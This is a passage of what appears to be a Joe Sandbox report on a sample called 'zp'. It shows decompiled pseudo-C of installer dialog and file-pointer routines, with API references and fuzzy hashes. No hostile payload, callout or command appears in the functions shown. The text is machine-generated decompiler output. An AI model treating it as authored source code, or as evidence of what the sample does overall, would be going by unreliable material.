                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404001(int _a4) {
                                                            				long _t2;
                                                            
                                                            				_t2 = SendMessageA( *0x4236e8, 0x28, _a4, 1); // executed
                                                            				return _t2;
                                                            			}




                                                            0x0040400f
                                                            0x00404015

                                                            APIs
                                                            • SendMessageA.USER32(00000028,?,00000001,00403E32), ref: 0040400F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: b349b1325232fe021fd412571e2c6441d382bb4e6ace6bfca539dacfea62cc2e
                                                            • Instruction ID: 72d9328d989bd28a4b04e8d0bfc49dcb98a3c5c69b67aa4312834a6063493829
                                                            • Opcode Fuzzy Hash: b349b1325232fe021fd412571e2c6441d382bb4e6ace6bfca539dacfea62cc2e
                                                            • Instruction Fuzzy Hash: 54B01235685200BBEE324F00DD0DF497E72F764B02F008034B300240F0C6B300A5DB19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004031CC(long _a4) {
                                                            				long _t2;
                                                            
                                                            				_t2 = SetFilePointer( *0x409018, _a4, 0, 0); // executed
                                                            				return _t2;
                                                            			}




                                                            0x004031da
                                                            0x004031e0

                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                            • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                            • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                            • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00403FEE(int _a4) {
                                                            				int _t2;
                                                            
                                                            				_t2 = EnableWindow( *0x41fcdc, _a4); // executed
                                                            				return _t2;
                                                            			}




                                                            0x00403ff8
                                                            0x00403ffe

                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(?,00403DCB), ref: 00403FF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: e35597bec60e1025900fee06943d1351a87652ae8cbe91aede0566df4541442b
                                                            • Instruction ID: ba8506c3699760f6a3e6afd6d9d514cfd718e0a5e630d9124f09760ea78015e0
                                                            • Opcode Fuzzy Hash: e35597bec60e1025900fee06943d1351a87652ae8cbe91aede0566df4541442b
                                                            • Instruction Fuzzy Hash: 73A01132808200AFCB028B00EE08C8ABF22BBA0300B02C030E200800B0CA320820FF8A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004014D6() {
                                                            				long _t2;
                                                            				void* _t6;
                                                            				void* _t10;
                                                            
                                                            				_t2 = E004029E0(_t6);
                                                            				if(_t2 <= 1) {
                                                            					_t2 = 1;
                                                            				}
                                                            				Sleep(_t2); // executed
                                                            				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t10 - 4));
                                                            				return 0;
                                                            			}






                                                            0x004014d7
                                                            0x004014df
                                                            0x004014e3
                                                            0x004014e3
                                                            0x004014e5
                                                            0x00402895
                                                            0x004028a1

                                                            APIs
                                                            • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: cdd133df43bec8c69db6d6e73807644b315103cccf73fc4762beba73f0853dd3
                                                            • Instruction ID: 8f5234f8cee202cc8b7374a2ab75ea98a04b7977738942e6e00dbb9fbc80be57
                                                            • Opcode Fuzzy Hash: cdd133df43bec8c69db6d6e73807644b315103cccf73fc4762beba73f0853dd3
                                                            • Instruction Fuzzy Hash: AED0C7B7B141006BD750E7B86E8545A73E8F75135A7148833D502E1191D17DC9418519
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 96%
                                                            			E00404946(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                            				struct HWND__* _v8;
                                                            				struct HWND__* _v12;
                                                            				signed int _v16;
                                                            				signed int _v20;
                                                            				intOrPtr _v24;
                                                            				signed char* _v28;
                                                            				long _v32;
                                                            				signed int _v40;
                                                            				int _v44;
                                                            				signed int* _v56;
                                                            				signed char* _v60;
                                                            				signed int _v64;
                                                            				long _v68;
                                                            				void* _v72;
                                                            				intOrPtr _v76;
                                                            				intOrPtr _v80;
                                                            				void* _v84;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t192;
                                                            				int _t194;
                                                            				intOrPtr _t195;
                                                            				intOrPtr _t197;
                                                            				long _t201;
                                                            				signed int _t205;
                                                            				signed int _t216;
                                                            				void* _t219;
                                                            				void* _t220;
                                                            				int _t226;
                                                            				signed int _t231;
                                                            				signed int _t232;
                                                            				signed int _t233;
                                                            				signed int _t239;
                                                            				signed int _t241;
                                                            				signed char _t242;
                                                            				signed char _t248;
                                                            				void* _t252;
                                                            				void* _t254;
                                                            				signed char* _t270;
                                                            				signed char _t271;
                                                            				long _t273;
                                                            				long _t276;
                                                            				int _t277;
                                                            				int _t282;
                                                            				signed int _t283;
                                                            				long _t284;
                                                            				signed int _t287;
                                                            				signed int _t294;
                                                            				int _t295;
                                                            				int _t296;
                                                            				signed char* _t302;
                                                            				struct HWND__* _t306;
                                                            				int _t307;
                                                            				signed int* _t308;
                                                            				int _t309;
                                                            				long _t310;
                                                            				signed int _t311;
                                                            				void* _t313;
                                                            				long _t314;
                                                            				int _t315;
                                                            				signed int _t316;
                                                            				void* _t318;
                                                            
                                                            				_t306 = _a4;
                                                            				_v12 = GetDlgItem(_t306, 0x3f9);
                                                            				_v8 = GetDlgItem(_t306, 0x408);
                                                            				_t318 = SendMessageA;
                                                            				_v20 =  *0x423708;
                                                            				_t282 = 0;
                                                            				_v24 =  *0x4236f0 + 0x94;
                                                            				if(_a8 != 0x110) {
                                                            					L23:
                                                            					if(_a8 != 0x405) {
                                                            						_t285 = _a16;
                                                            					} else {
                                                            						_a12 = _t282;
                                                            						_t285 = 1;
                                                            						_a8 = 0x40f;
                                                            						_a16 = 1;
                                                            					}
                                                            					if(_a8 == 0x4e || _a8 == 0x413) {
                                                            						_v16 = _t285;
                                                            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
                                                            							if(( *0x4236f9 & 0x00000002) != 0) {
                                                            								L41:
                                                            								if(_v16 != _t282) {
                                                            									_t231 = _v16;
                                                            									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
                                                            										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c));
                                                            									}
                                                            									_t232 = _v16;
                                                            									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
                                                            										_t285 = _v20;
                                                            										_t233 =  *(_t232 + 0x5c);
                                                            										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
                                                            											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) & 0xffffffdf;
                                                            										} else {
                                                            											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
                                                            										}
                                                            									}
                                                            								}
                                                            								goto L48;
                                                            							}
                                                            							if(_a8 == 0x413) {
                                                            								L33:
                                                            								_t285 = 0 | _a8 != 0x00000413;
                                                            								_t239 = E00404894(_v8, _a8 != 0x413);
                                                            								_t311 = _t239;
                                                            								if(_t311 >= _t282) {
                                                            									_t88 = _v20 + 8; // 0x8
                                                            									_t285 = _t239 * 0x418 + _t88;
                                                            									_t241 =  *_t285;
                                                            									if((_t241 & 0x00000010) == 0) {
                                                            										if((_t241 & 0x00000040) == 0) {
                                                            											_t242 = _t241 ^ 0x00000001;
                                                            										} else {
                                                            											_t248 = _t241 ^ 0x00000080;
                                                            											if(_t248 >= 0) {
                                                            												_t242 = _t248 & 0x000000fe;
                                                            											} else {
                                                            												_t242 = _t248 | 0x00000001;
                                                            											}
                                                            										}
                                                            										 *_t285 = _t242;
                                                            										E0040117D(_t311);
                                                            										_a12 = _t311 + 1;
                                                            										_a16 =  !( *0x4236f8) >> 0x00000008 & 0x00000001;
                                                            										_a8 = 0x40f;
                                                            									}
                                                            								}
                                                            								goto L41;
                                                            							}
                                                            							_t285 = _a16;
                                                            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                            								goto L41;
                                                            							}
                                                            							goto L33;
                                                            						} else {
                                                            							goto L48;
                                                            						}
                                                            					} else {
                                                            						L48:
                                                            						if(_a8 != 0x111) {
                                                            							L56:
                                                            							if(_a8 == 0x200) {
                                                            								SendMessageA(_v8, 0x200, _t282, _t282);
                                                            							}
                                                            							if(_a8 == 0x40b) {
                                                            								_t219 =  *0x41fcc4; // 0x0
                                                            								if(_t219 != _t282) {
                                                            									ImageList_Destroy(_t219);
                                                            								}
                                                            								_t220 =  *0x41fcd8; // 0x0
                                                            								if(_t220 != _t282) {
                                                            									GlobalFree(_t220);
                                                            								}
                                                            								 *0x41fcc4 = _t282;
                                                            								 *0x41fcd8 = _t282;
                                                            								 *0x423740 = _t282;
                                                            							}
                                                            							if(_a8 != 0x40f) {
                                                            								L88:
                                                            								if(_a8 == 0x420 && ( *0x4236f9 & 0x00000001) != 0) {
                                                            									_t307 = (0 | _a16 == 0x00000020) << 3;
                                                            									ShowWindow(_v8, _t307);
                                                            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
                                                            								}
                                                            								goto L91;
                                                            							} else {
                                                            								E004011EF(_t285, _t282, _t282);
                                                            								_t192 = _a12;
                                                            								if(_t192 != _t282) {
                                                            									if(_t192 != 0xffffffff) {
                                                            										_t192 = _t192 - 1;
                                                            									}
                                                            									_push(_t192);
                                                            									_push(8);
                                                            									E00404914();
                                                            								}
                                                            								if(_a16 == _t282) {
                                                            									L75:
                                                            									E004011EF(_t285, _t282, _t282);
                                                            									_t194 =  *0x41fcd8; // 0x0
                                                            									_v32 = _t194;
                                                            									_t195 =  *0x423708;
                                                            									_v60 = 0xf030;
                                                            									_v20 = _t282;
                                                            									if( *0x42370c <= _t282) {
                                                            										L86:
                                                            										InvalidateRect(_v8, _t282, 1);
                                                            										_t197 =  *0x422ebc; // 0x6f57cb
                                                            										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
                                                            											E004047B2(0x3ff, 0xfffffffb, E00404867(5));
                                                            										}
                                                            										goto L88;
                                                            									}
                                                            									_t308 = _t195 + 8;
                                                            									do {
                                                            										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
                                                            										if(_t201 != _t282) {
                                                            											_t287 =  *_t308;
                                                            											_v68 = _t201;
                                                            											_v72 = 8;
                                                            											if((_t287 & 0x00000001) != 0) {
                                                            												_v72 = 9;
                                                            												_v56 =  &(_t308[4]);
                                                            												_t308[0] = _t308[0] & 0x000000fe;
                                                            											}
                                                            											if((_t287 & 0x00000040) == 0) {
                                                            												_t205 = (_t287 & 0x00000001) + 1;
                                                            												if((_t287 & 0x00000010) != 0) {
                                                            													_t205 = _t205 + 3;
                                                            												}
                                                            											} else {
                                                            												_t205 = 3;
                                                            											}
                                                            											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
                                                            											SendMessageA(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                            											SendMessageA(_v8, 0x110d, _t282,  &_v72);
                                                            										}
                                                            										_v20 = _v20 + 1;
                                                            										_t308 =  &(_t308[0x106]);
                                                            									} while (_v20 <  *0x42370c);
                                                            									goto L86;
                                                            								} else {
                                                            									_t309 = E004012E2( *0x41fcd8);
                                                            									E00401299(_t309);
                                                            									_t216 = 0;
                                                            									_t285 = 0;
                                                            									if(_t309 <= _t282) {
                                                            										L74:
                                                            										SendMessageA(_v12, 0x14e, _t285, _t282);
                                                            										_a16 = _t309;
                                                            										_a8 = 0x420;
                                                            										goto L75;
                                                            									} else {
                                                            										goto L71;
                                                            									}
                                                            									do {
                                                            										L71:
                                                            										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
                                                            											_t285 = _t285 + 1;
                                                            										}
                                                            										_t216 = _t216 + 1;
                                                            									} while (_t216 < _t309);
                                                            									goto L74;
                                                            								}
                                                            							}
                                                            						}
                                                            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                            							goto L91;
                                                            						} else {
                                                            							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
                                                            							if(_t226 == 0xffffffff) {
                                                            								goto L91;
                                                            							}
                                                            							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
                                                            							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
                                                            								_t310 = 0x20;
                                                            							}
                                                            							E00401299(_t310);
                                                            							SendMessageA(_a4, 0x420, _t282, _t310);
                                                            							_a12 = _a12 | 0xffffffff;
                                                            							_a16 = _t282;
                                                            							_a8 = 0x40f;
                                                            							goto L56;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_v32 = 0;
                                                            					_v16 = 2;
                                                            					 *0x423740 = _t306;
                                                            					 *0x41fcd8 = GlobalAlloc(0x40,  *0x42370c << 2);
                                                            					_t252 = LoadBitmapA( *0x4236e0, 0x6e);
                                                            					 *0x41fccc =  *0x41fccc | 0xffffffff;
                                                            					_t313 = _t252;
                                                            					 *0x41fcd4 = SetWindowLongA(_v8, 0xfffffffc, E00404F3D);
                                                            					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                            					 *0x41fcc4 = _t254;
                                                            					ImageList_AddMasked(_t254, _t313, 0xff00ff);
                                                            					SendMessageA(_v8, 0x1109, 2,  *0x41fcc4);
                                                            					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                            						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                            					}
                                                            					DeleteObject(_t313);
                                                            					_t314 = 0;
                                                            					do {
                                                            						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
                                                            						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
                                                            							if(_t314 != 0x20) {
                                                            								_v16 = _t282;
                                                            							}
                                                            							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t282, E00405D00(_t282, _t314, _t318, _t282, _t260)), _t314);
                                                            						}
                                                            						_t314 = _t314 + 1;
                                                            					} while (_t314 < 0x21);
                                                            					_t315 = _a16;
                                                            					_t283 = _v16;
                                                            					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
                                                            					_push(0x15);
                                                            					E00403FCC(_a4);
                                                            					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
                                                            					_push(0x16);
                                                            					E00403FCC(_a4);
                                                            					_t316 = 0;
                                                            					_t284 = 0;
                                                            					if( *0x42370c <= 0) {
                                                            						L19:
                                                            						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                            						goto L20;
                                                            					} else {
                                                            						_t302 = _v20 + 8;
                                                            						_v28 = _t302;
                                                            						do {
                                                            							_t270 =  &(_t302[0x10]);
                                                            							if( *_t270 != 0) {
                                                            								_v60 = _t270;
                                                            								_t271 =  *_t302;
                                                            								_t294 = 0x20;
                                                            								_v84 = _t284;
                                                            								_v80 = 0xffff0002;
                                                            								_v76 = 0xd;
                                                            								_v64 = _t294;
                                                            								_v40 = _t316;
                                                            								_v68 = _t271 & _t294;
                                                            								if((_t271 & 0x00000002) == 0) {
                                                            									if((_t271 & 0x00000004) == 0) {
                                                            										_t273 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                            										_t295 =  *0x41fcd8; // 0x0
                                                            										 *(_t295 + _t316 * 4) = _t273;
                                                            									} else {
                                                            										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
                                                            									}
                                                            								} else {
                                                            									_v76 = 0x4d;
                                                            									_v44 = 1;
                                                            									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                            									_t296 =  *0x41fcd8; // 0x0
                                                            									_v32 = 1;
                                                            									 *(_t296 + _t316 * 4) = _t276;
                                                            									_t277 =  *0x41fcd8; // 0x0
                                                            									_t284 =  *(_t277 + _t316 * 4);
                                                            								}
                                                            							}
                                                            							_t316 = _t316 + 1;
                                                            							_t302 =  &(_v28[0x418]);
                                                            							_v28 = _t302;
                                                            						} while (_t316 <  *0x42370c);
                                                            						if(_v32 != 0) {
                                                            							L20:
                                                            							if(_v16 != 0) {
                                                            								E00404001(_v8);
                                                            								_t282 = 0;
                                                            								goto L23;
                                                            							} else {
                                                            								ShowWindow(_v12, 5);
                                                            								E00404001(_v12);
                                                            								L91:
                                                            								return E00404033(_a8, _a12, _a16);
                                                            							}
                                                            						}
                                                            						goto L19;
                                                            					}
                                                            				}
                                                            			}


































































                                                            0x00404955
                                                            0x00404966
                                                            0x0040496b
                                                            0x00404973
                                                            0x00404979
                                                            0x00404981
                                                            0x0040498f
                                                            0x00404992
                                                            0x00404bb2
                                                            0x00404bb9
                                                            0x00404bcd
                                                            0x00404bbb
                                                            0x00404bbd
                                                            0x00404bc0
                                                            0x00404bc1
                                                            0x00404bc8
                                                            0x00404bc8
                                                            0x00404bd9
                                                            0x00404be7
                                                            0x00404bea
                                                            0x00404c00
                                                            0x00404c75
                                                            0x00404c78
                                                            0x00404c7a
                                                            0x00404c84
                                                            0x00404c92
                                                            0x00404c92
                                                            0x00404c94
                                                            0x00404c9e
                                                            0x00404ca4
                                                            0x00404ca7
                                                            0x00404caa
                                                            0x00404cc5
                                                            0x00404cac
                                                            0x00404cb6
                                                            0x00404cb6
                                                            0x00404caa
                                                            0x00404c9e
                                                            0x00000000
                                                            0x00404c78
                                                            0x00404c05
                                                            0x00404c10
                                                            0x00404c15
                                                            0x00404c1c
                                                            0x00404c21
                                                            0x00404c25
                                                            0x00404c30
                                                            0x00404c30
                                                            0x00404c34
                                                            0x00404c38
                                                            0x00404c3c
                                                            0x00404c4f
                                                            0x00404c3e
                                                            0x00404c3e
                                                            0x00404c45
                                                            0x00404c4b
                                                            0x00404c47
                                                            0x00404c47
                                                            0x00404c47
                                                            0x00404c45
                                                            0x00404c53
                                                            0x00404c55
                                                            0x00404c68
                                                            0x00404c6b
                                                            0x00404c6e
                                                            0x00404c6e
                                                            0x00404c38
                                                            0x00000000
                                                            0x00404c25
                                                            0x00404c07
                                                            0x00404c0e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404cc8
                                                            0x00404cc8
                                                            0x00404ccf
                                                            0x00404d40
                                                            0x00404d48
                                                            0x00404d50
                                                            0x00404d50
                                                            0x00404d59
                                                            0x00404d5b
                                                            0x00404d62
                                                            0x00404d65
                                                            0x00404d65
                                                            0x00404d6b
                                                            0x00404d72
                                                            0x00404d75
                                                            0x00404d75
                                                            0x00404d7b
                                                            0x00404d81
                                                            0x00404d87
                                                            0x00404d87
                                                            0x00404d94
                                                            0x00404eea
                                                            0x00404ef1
                                                            0x00404f0e
                                                            0x00404f14
                                                            0x00404f26
                                                            0x00404f26
                                                            0x00000000
                                                            0x00404d9a
                                                            0x00404d9c
                                                            0x00404da1
                                                            0x00404da6
                                                            0x00404dab
                                                            0x00404dad
                                                            0x00404dad
                                                            0x00404dae
                                                            0x00404daf
                                                            0x00404db1
                                                            0x00404db1
                                                            0x00404db9
                                                            0x00404dfa
                                                            0x00404dfc
                                                            0x00404e01
                                                            0x00404e0c
                                                            0x00404e0f
                                                            0x00404e14
                                                            0x00404e1b
                                                            0x00404e1e
                                                            0x00404ec0
                                                            0x00404ec6
                                                            0x00404ecc
                                                            0x00404ed4
                                                            0x00404ee5
                                                            0x00404ee5
                                                            0x00000000
                                                            0x00404ed4
                                                            0x00404e24
                                                            0x00404e27
                                                            0x00404e2d
                                                            0x00404e32
                                                            0x00404e34
                                                            0x00404e36
                                                            0x00404e3c
                                                            0x00404e43
                                                            0x00404e48
                                                            0x00404e4f
                                                            0x00404e52
                                                            0x00404e52
                                                            0x00404e59
                                                            0x00404e65
                                                            0x00404e69
                                                            0x00404e6b
                                                            0x00404e6b
                                                            0x00404e5b
                                                            0x00404e5d
                                                            0x00404e5d
                                                            0x00404e8b
                                                            0x00404e97
                                                            0x00404ea6
                                                            0x00404ea6
                                                            0x00404ea8
                                                            0x00404eab
                                                            0x00404eb4
                                                            0x00000000
                                                            0x00404dbb
                                                            0x00404dc6
                                                            0x00404dc9
                                                            0x00404dce
                                                            0x00404dd0
                                                            0x00404dd4
                                                            0x00404de4
                                                            0x00404dee
                                                            0x00404df0
                                                            0x00404df3
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404dd6
                                                            0x00404dd6
                                                            0x00404ddc
                                                            0x00404dde
                                                            0x00404dde
                                                            0x00404ddf
                                                            0x00404de0
                                                            0x00000000
                                                            0x00404dd6
                                                            0x00404db9
                                                            0x00404d94
                                                            0x00404cd7
                                                            0x00000000
                                                            0x00404ced
                                                            0x00404cf7
                                                            0x00404cfc
                                                            0x00000000
                                                            0x00000000
                                                            0x00404d0e
                                                            0x00404d13
                                                            0x00404d1f
                                                            0x00404d1f
                                                            0x00404d21
                                                            0x00404d30
                                                            0x00404d32
                                                            0x00404d36
                                                            0x00404d39
                                                            0x00000000
                                                            0x00404d39
                                                            0x00404cd7
                                                            0x00404998
                                                            0x0040499d
                                                            0x004049a6
                                                            0x004049ad
                                                            0x004049bb
                                                            0x004049c6
                                                            0x004049cc
                                                            0x004049da
                                                            0x004049ee
                                                            0x004049f3
                                                            0x00404a00
                                                            0x00404a05
                                                            0x00404a1b
                                                            0x00404a2c
                                                            0x00404a39
                                                            0x00404a39
                                                            0x00404a3c
                                                            0x00404a42
                                                            0x00404a44
                                                            0x00404a47
                                                            0x00404a4c
                                                            0x00404a51
                                                            0x00404a53
                                                            0x00404a53
                                                            0x00404a73
                                                            0x00404a73
                                                            0x00404a75
                                                            0x00404a76
                                                            0x00404a7b
                                                            0x00404a7e
                                                            0x00404a81
                                                            0x00404a85
                                                            0x00404a8a
                                                            0x00404a8f
                                                            0x00404a93
                                                            0x00404a98
                                                            0x00404a9d
                                                            0x00404a9f
                                                            0x00404aa7
                                                            0x00404b71
                                                            0x00404b84
                                                            0x00000000
                                                            0x00404aad
                                                            0x00404ab0
                                                            0x00404ab3
                                                            0x00404ab6
                                                            0x00404ab6
                                                            0x00404abc
                                                            0x00404ac2
                                                            0x00404ac5
                                                            0x00404acb
                                                            0x00404acc
                                                            0x00404ad1
                                                            0x00404ada
                                                            0x00404ae1
                                                            0x00404ae4
                                                            0x00404ae7
                                                            0x00404aea
                                                            0x00404b26
                                                            0x00404b47
                                                            0x00404b49
                                                            0x00404b4f
                                                            0x00404b28
                                                            0x00404b35
                                                            0x00404b35
                                                            0x00404aec
                                                            0x00404aef
                                                            0x00404afe
                                                            0x00404b08
                                                            0x00404b0a
                                                            0x00404b10
                                                            0x00404b17
                                                            0x00404b1a
                                                            0x00404b1f
                                                            0x00404b1f
                                                            0x00404aea
                                                            0x00404b55
                                                            0x00404b56
                                                            0x00404b62
                                                            0x00404b62
                                                            0x00404b6f
                                                            0x00404b8a
                                                            0x00404b8e
                                                            0x00404bab
                                                            0x00404bb0
                                                            0x00000000
                                                            0x00404b90
                                                            0x00404b95
                                                            0x00404b9e
                                                            0x00404f28
                                                            0x00404f3a
                                                            0x00404f3a
                                                            0x00404b8e
                                                            0x00000000
                                                            0x00404b6f
                                                            0x00404aa7

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003F9), ref: 0040495E
                                                            • GetDlgItem.USER32(?,00000408), ref: 00404969
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 004049B3
                                                            • LoadBitmapA.USER32(0000006E), ref: 004049C6
                                                            • SetWindowLongA.USER32(?,000000FC,00404F3D), ref: 004049DF
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049F3
                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A05
                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 00404A1B
                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A27
                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A39
                                                            • DeleteObject.GDI32(00000000), ref: 00404A3C
                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A67
                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A73
                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B08
                                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B33
